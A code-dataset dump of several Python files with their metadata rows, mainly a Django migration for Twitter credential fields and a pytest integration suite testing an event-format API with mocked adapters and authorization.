| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c19d90999ea2df3cec03fb6619c504e05deab5c
| 133
|
py
|
Python
|
jai_benchmark/tools/__init__.py
|
LaudateCorpus1/edgeai-benchmark
|
bc7f3c52862133f5fe8409248c21887b3f930a68
|
[
"BSD-3-Clause"
] | 7
|
2021-07-31T16:41:57.000Z
|
2022-03-30T23:29:12.000Z
|
jai_benchmark/tools/__init__.py
|
LaudateCorpus1/edgeai-benchmark
|
bc7f3c52862133f5fe8409248c21887b3f930a68
|
[
"BSD-3-Clause"
] | 3
|
2022-02-09T17:39:02.000Z
|
2022-03-30T07:07:06.000Z
|
jai_benchmark/tools/__init__.py
|
LaudateCorpus1/edgeai-benchmark
|
bc7f3c52862133f5fe8409248c21887b3f930a68
|
[
"BSD-3-Clause"
] | 3
|
2021-11-15T01:44:32.000Z
|
2022-01-20T05:19:27.000Z
|
from .run_accuracy import *
from .run_report import *
from .run_package import *
from .run_model import *
from .get_configs import *
| 22.166667
| 27
| 0.774436
| 20
| 133
| 4.9
| 0.45
| 0.285714
| 0.397959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150376
| 133
| 5
| 28
| 26.6
| 0.867257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9112bd880035ebd0c6fb59ad3d518d265d16b123
| 993
|
py
|
Python
|
chirp/migrations/0032_alter_user_twitter_credentials.py
|
kingsdigitallab/tap-django
|
5a7c48cc6ae5134b6e6435b459cf1c00761f2895
|
[
"MIT"
] | null | null | null |
chirp/migrations/0032_alter_user_twitter_credentials.py
|
kingsdigitallab/tap-django
|
5a7c48cc6ae5134b6e6435b459cf1c00761f2895
|
[
"MIT"
] | null | null | null |
chirp/migrations/0032_alter_user_twitter_credentials.py
|
kingsdigitallab/tap-django
|
5a7c48cc6ae5134b6e6435b459cf1c00761f2895
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.6 on 2018-06-20 12:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('chirp', '0031_alter_field_active_on_filter'),
]
operations = [
migrations.AlterField(
model_name='user',
name='twitter_access_token',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='user',
name='twitter_access_token_secret',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='user',
name='twitter_api_key',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='user',
name='twitter_api_secret',
field=models.CharField(blank=True, max_length=64, null=True),
),
]
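For reference, the four AlterField operations above each correspond to a field declaration of this shape on chirp's custom User model (reconstructed directly from the operations; the model itself lives outside this migration):

    twitter_api_key = models.CharField(blank=True, max_length=64, null=True)
    twitter_api_secret = models.CharField(blank=True, max_length=64, null=True)
    twitter_access_token = models.CharField(blank=True, max_length=64, null=True)
    twitter_access_token_secret = models.CharField(blank=True, max_length=64, null=True)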
| 29.205882
| 73
| 0.593152
| 108
| 993
| 5.25
| 0.407407
| 0.141093
| 0.176367
| 0.204586
| 0.719577
| 0.719577
| 0.719577
| 0.719577
| 0.719577
| 0.603175
| 0
| 0.038407
| 0.292044
| 993
| 33
| 74
| 30.090909
| 0.768137
| 0.045317
| 0
| 0.592593
| 1
| 0
| 0.141649
| 0.063425
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
913a6533319f7182fd37937fd1d1976eea7b45fc
| 46
|
py
|
Python
|
NiLBS/pose/__init__.py
|
joemarch010/NILBS
|
c6568818ec8acdb0fe4bd8d197278f0abb361d0b
|
[
"MIT"
] | 2
|
2021-04-01T07:55:11.000Z
|
2021-12-10T02:57:59.000Z
|
NiLBS/pose/__init__.py
|
joemarch010/NILBS
|
c6568818ec8acdb0fe4bd8d197278f0abb361d0b
|
[
"MIT"
] | null | null | null |
NiLBS/pose/__init__.py
|
joemarch010/NILBS
|
c6568818ec8acdb0fe4bd8d197278f0abb361d0b
|
[
"MIT"
] | null | null | null |
import NiLBS.pose.pose
import NiLBS.pose.util
| 15.333333
| 22
| 0.826087
| 8
| 46
| 4.75
| 0.5
| 0.578947
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 3
| 23
| 15.333333
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e678d83bd54fac0f47348d1ae0c1b594584541d7
| 206
|
py
|
Python
|
atest/testdata/keywords/Annotations.py
|
phil-davis/robotframework
|
4d4ce686cbe01e293bb86ea6ff34330e8c45fc43
|
[
"ECL-2.0",
"Apache-2.0"
] | 9
|
2020-04-22T08:30:52.000Z
|
2020-12-07T08:25:09.000Z
|
atest/testdata/keywords/Annotations.py
|
phil-davis/robotframework
|
4d4ce686cbe01e293bb86ea6ff34330e8c45fc43
|
[
"ECL-2.0",
"Apache-2.0"
] | 63
|
2020-03-04T17:31:39.000Z
|
2022-03-01T09:12:16.000Z
|
atest/testdata/keywords/Annotations.py
|
phil-davis/robotframework
|
4d4ce686cbe01e293bb86ea6ff34330e8c45fc43
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2016-02-29T15:42:22.000Z
|
2018-05-08T08:58:18.000Z
|
def annotations(arg1, arg2: str):
return ' '.join(['annotations:', arg1, arg2])
def annotations_with_defaults(arg1, arg2: 'has a default' = 'default'):
return ' '.join(['annotations:', arg1, arg2])
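Derived directly from the bodies above, the two keywords behave as:

annotations('hello', 'world')        # -> 'annotations: hello world'
annotations_with_defaults('hello')   # -> 'annotations: hello default'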
| 34.333333
| 71
| 0.665049
| 25
| 206
| 5.4
| 0.48
| 0.237037
| 0.422222
| 0.37037
| 0.42963
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.145631
| 206
| 5
| 72
| 41.2
| 0.721591
| 0
| 0
| 0.5
| 0
| 0
| 0.223301
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
e68932926ea1844b1107dbfceba533de2e7d302a
| 48
|
py
|
Python
|
dbrlint/src/dbrlint/linter.py
|
wjohnson/AzureDatabricks
|
06882df364fba7e51bf83e561bf46670aff1858a
|
[
"MIT"
] | null | null | null |
dbrlint/src/dbrlint/linter.py
|
wjohnson/AzureDatabricks
|
06882df364fba7e51bf83e561bf46670aff1858a
|
[
"MIT"
] | null | null | null |
dbrlint/src/dbrlint/linter.py
|
wjohnson/AzureDatabricks
|
06882df364fba7e51bf83e561bf46670aff1858a
|
[
"MIT"
] | null | null | null |
from abc import ABC
class Linter(ABC):
pass
| 12
| 19
| 0.708333
| 8
| 48
| 4.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.229167
| 48
| 4
| 20
| 12
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
fc0be4ebbd648adc537b0cf456363d84a4543a24
| 23,636
|
py
|
Python
|
tests/integration/test_event_format.py
|
langrenn-sprint/event-service
|
6ebaffdbd118a7a4ebce0994af22b9ef04a0cb8d
|
[
"Apache-2.0"
] | 1
|
2021-09-12T20:41:02.000Z
|
2021-09-12T20:41:02.000Z
|
tests/integration/test_event_format.py
|
langrenn-sprint/event-service
|
6ebaffdbd118a7a4ebce0994af22b9ef04a0cb8d
|
[
"Apache-2.0"
] | 49
|
2021-06-14T14:44:29.000Z
|
2022-03-28T18:23:37.000Z
|
tests/integration/test_event_format.py
|
langrenn-sprint/event-service
|
6ebaffdbd118a7a4ebce0994af22b9ef04a0cb8d
|
[
"Apache-2.0"
] | null | null | null |
"""Integration test cases for the event_format route."""
from copy import deepcopy
import os
from typing import Dict
from aiohttp import hdrs
from aiohttp.test_utils import TestClient as _TestClient
from aioresponses import aioresponses
import jwt
from multidict import MultiDict
import pytest
from pytest_mock import MockFixture
@pytest.fixture
def token() -> str:
"""Create a valid token."""
secret = os.getenv("JWT_SECRET")
algorithm = "HS256"
payload = {"identity": os.getenv("ADMIN_USERNAME")}
return jwt.encode(payload, secret, algorithm) # type: ignore
@pytest.fixture
async def event() -> Dict[str, str]:
"""An event object for testing."""
return {
"id": "event_id_1",
"name": "Oslo Skagen sprint",
"competition_format": "Individual sprint",
"date_of_event": "2021-08-31",
"organiser": "Lyn Ski",
"webpage": "https://example.com",
"information": "Testarr for å teste den nye løysinga.",
}
@pytest.fixture
async def new_event_format_interval_start() -> dict:
"""Create a mock event_format object."""
return {
"name": "Interval Start",
"starting_order": "Draw",
"start_procedure": "Interval Start",
"time_between_groups": "00:10:00",
"intervals": "00:00:30",
"max_no_of_contestants_in_raceclass": 9999,
"max_no_of_contestants_in_race": 9999,
"datatype": "interval_start",
}
@pytest.fixture
async def new_event_format_individual_sprint() -> dict:
"""Create a mock event_format object."""
return {
"name": "Individual Sprint",
"starting_order": "Draw",
"start_procedure": "Interval Start",
"time_between_groups": "00:10:00",
"time_between_rounds": "00:05:00",
"time_between_heats": "00:02:30",
"max_no_of_contestants_in_raceclass": 80,
"max_no_of_contestants_in_race": 10,
"datatype": "individual_sprint",
}
@pytest.fixture
async def event_format_interval_start() -> dict:
"""Create a mock event_format object."""
return {
"name": "Interval Start",
"starting_order": "Draw",
"start_procedure": "Interval Start",
"time_between_groups": "00:10:00",
"intervals": "00:00:30",
"max_no_of_contestants_in_raceclass": 9999,
"max_no_of_contestants_in_race": 9999,
"datatype": "interval_start",
}
@pytest.fixture
async def event_format_individual_sprint() -> dict:
"""Create a mock event_format object."""
return {
"name": "Individual Sprint",
"starting_order": "Draw",
"start_procedure": "Interval Start",
"time_between_groups": "00:10:00",
"time_between_rounds": "00:05:00",
"time_between_heats": "00:02:30",
"max_no_of_contestants_in_raceclass": 80,
"max_no_of_contestants_in_race": 10,
"datatype": "individual_sprint",
}
@pytest.mark.integration
async def test_create_event_format_interval_start(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event: dict,
new_event_format_interval_start: dict,
) -> None:
"""Should return Created, location header."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = new_event_format_interval_start
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 201
assert f"/events/{EVENT_ID}/format" in resp.headers[hdrs.LOCATION]
@pytest.mark.integration
async def test_create_event_format_individual_sprint(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event: dict,
new_event_format_individual_sprint: dict,
) -> None:
"""Should return Created, location header."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = new_event_format_individual_sprint
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 201
assert f"/events/{EVENT_ID}/format" in resp.headers[hdrs.LOCATION]
@pytest.mark.integration
async def test_get_event_format_interval_start(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_interval_start: dict,
) -> None:
"""Should return OK, and a body containing one event_format."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_interval_start,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.get(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 200
assert "application/json" in resp.headers[hdrs.CONTENT_TYPE]
body = await resp.json()
assert type(body) is dict
assert body["name"] == event_format_interval_start["name"]
assert body["starting_order"] == event_format_interval_start["starting_order"]
assert body["start_procedure"] == event_format_interval_start["start_procedure"]
assert body["intervals"] == event_format_interval_start["intervals"]
@pytest.mark.integration
async def test_get_event_format_individual_sprint(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_individual_sprint: dict,
) -> None:
"""Should return OK, and a body containing one event_format."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_individual_sprint,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.get(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 200
assert "application/json" in resp.headers[hdrs.CONTENT_TYPE]
body = await resp.json()
assert type(body) is dict
assert body["name"] == event_format_individual_sprint["name"]
assert (
body["starting_order"] == event_format_individual_sprint["starting_order"]
)
assert (
body["start_procedure"] == event_format_individual_sprint["start_procedure"]
)
assert (
body["time_between_heats"]
== event_format_individual_sprint["time_between_heats"]
)
assert (
body["time_between_rounds"]
== event_format_individual_sprint["time_between_rounds"]
)
assert (
body["max_no_of_contestants_in_raceclass"]
== event_format_individual_sprint["max_no_of_contestants_in_raceclass"]
)
assert (
body["max_no_of_contestants_in_race"]
== event_format_individual_sprint["max_no_of_contestants_in_race"]
)
@pytest.mark.integration
async def test_update_event_format_interval_start(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_interval_start: dict,
) -> None:
"""Should return No Content."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format", # noqa: B950
return_value=event_format_interval_start,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
request_body = deepcopy(event_format_interval_start)
request_body["starting_order"] = "Manual Draw"
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 204
@pytest.mark.integration
async def test_update_event_format_individual_sprint(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_individual_sprint: dict,
) -> None:
"""Should return No Content."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format", # noqa: B950
return_value=event_format_individual_sprint,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
request_body = deepcopy(event_format_individual_sprint)
request_body["starting_order"] = "Manual Draw"
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 204
@pytest.mark.integration
async def test_delete_event_format(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_interval_start: dict,
) -> None:
"""Should return No Content."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format", # noqa: B950
return_value=event_format_interval_start,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.delete_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.delete(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 204
# Bad cases
# Event not found
@pytest.mark.integration
async def test_create_event_format_event_not_found(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
new_event_format_interval_start: dict,
) -> None:
"""Should return 404 Not found."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=None,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = new_event_format_interval_start
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 404
# Mandatory properties missing at create and update:
@pytest.mark.integration
async def test_create_event_format_missing_mandatory_property(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event: dict,
) -> None:
"""Should return 422 HTTPUnprocessableEntity."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = {"id": RACECLASS_ID, "optional_property": "Optional_property"}
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 422
@pytest.mark.integration
async def test_update_event_format_missing_mandatory_property(
client: _TestClient, mocker: MockFixture, token: MockFixture
) -> None:
"""Should return 422 HTTPUnprocessableEntity."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format", # noqa: B950
return_value={"id": RACECLASS_ID, "name": "missing_the_rest_of_the_properties"},
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
request_body = {"id": RACECLASS_ID, "name": "missing_the_rest_of_the_properties"}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 422
@pytest.mark.integration
async def test_create_event_format_adapter_fails(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event: dict,
new_event_format_interval_start: dict,
) -> None:
"""Should return 400 HTTPBadRequest."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=None,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format", # noqa: B950
return_value=None,
)
request_body = new_event_format_interval_start
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 400
# Unauthorized cases:
@pytest.mark.integration
async def test_create_event_format_no_authorization(
client: _TestClient,
mocker: MockFixture,
event: dict,
new_event_format_interval_start: dict,
) -> None:
"""Should return 401 Unauthorized."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = new_event_format_interval_start
headers = MultiDict([(hdrs.CONTENT_TYPE, "application/json")])
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 401
@pytest.mark.integration
async def test_get_event_format_no_authorization(
client: _TestClient, mocker: MockFixture, event_format_interval_start: dict
) -> None:
"""Should return 401 Unauthorized."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_interval_start,
)
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.get(f"/events/{EVENT_ID}/format")
assert resp.status == 401
@pytest.mark.integration
async def test_put_event_format_no_authorization(
client: _TestClient, mocker: MockFixture, event_format_interval_start: dict
) -> None:
"""Should return 401 Unauthorizedt."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_interval_start,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
}
request_body = event_format_interval_start
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 401
@pytest.mark.integration
async def test_list_event_format_no_authorization(
client: _TestClient, mocker: MockFixture, event_format_interval_start: dict
) -> None:
"""Should return 401 Unauthorized."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=[event_format_interval_start],
)
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.get(f"/events/{EVENT_ID}/format")
assert resp.status == 401
@pytest.mark.integration
async def test_delete_event_format_no_authorization(
client: _TestClient, mocker: MockFixture, event_format_interval_start: dict
) -> None:
"""Should return 401 Unauthorized."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_interval_start,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.delete_event_format",
return_value=RACECLASS_ID,
)
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.delete(f"/events/{EVENT_ID}/format")
assert resp.status == 401
# NOT FOUND CASES:
@pytest.mark.integration
async def test_get_event_format_not_found(
client: _TestClient, mocker: MockFixture, token: MockFixture
) -> None:
"""Should return 404 Not found."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=None,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.get(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 404
@pytest.mark.integration
async def test_update_event_format_not_found(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_interval_start: dict,
) -> None:
"""Should return 404 Not found."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=None,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=None,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
request_body = event_format_interval_start
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 404
@pytest.mark.integration
async def test_delete_event_format_not_found(
client: _TestClient, mocker: MockFixture, token: MockFixture
) -> None:
"""Should return 404 Not found."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=None,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.delete_event_format",
return_value=None,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.delete(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 404
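All cases above carry @pytest.mark.integration, so the suite can be filtered to just these tests with pytest -m integration. If the project does not already register the marker in pytest.ini or pyproject.toml, a minimal conftest.py registration (an assumption, not code from this repository) would be:

def pytest_configure(config):
    # Register the custom marker so "pytest -m integration" runs warning-free.
    config.addinivalue_line(
        "markers", "integration: integration test cases for the event service"
    )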
| 33.384181
| 107
| 0.676426
| 2,798
| 23,636
| 5.435668
| 0.065404
| 0.096916
| 0.041028
| 0.058978
| 0.928989
| 0.92419
| 0.912092
| 0.900191
| 0.888487
| 0.853113
| 0
| 0.038416
| 0.208157
| 23,636
| 707
| 108
| 33.4314
| 0.774204
| 0.013581
| 0
| 0.748727
| 0
| 0
| 0.310641
| 0.190881
| 0
| 0
| 0
| 0
| 0.061121
| 1
| 0.001698
| false
| 0.032258
| 0.016978
| 0
| 0.028862
| 0.042445
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc61fc008f5a2ff0110efe4d746b412fd0f68f32
| 14,208
|
py
|
Python
|
library/plugins/tests/test_views.py
|
lizgehret/library
|
e9343bb0a4a709064b6a817b99f3b410cc7a3978
|
[
"BSD-3-Clause"
] | 2
|
2018-08-17T03:50:41.000Z
|
2018-11-19T03:49:39.000Z
|
library/plugins/tests/test_views.py
|
lizgehret/library
|
e9343bb0a4a709064b6a817b99f3b410cc7a3978
|
[
"BSD-3-Clause"
] | 15
|
2018-08-22T16:39:09.000Z
|
2021-09-28T18:28:05.000Z
|
library/plugins/tests/test_views.py
|
lizgehret/library
|
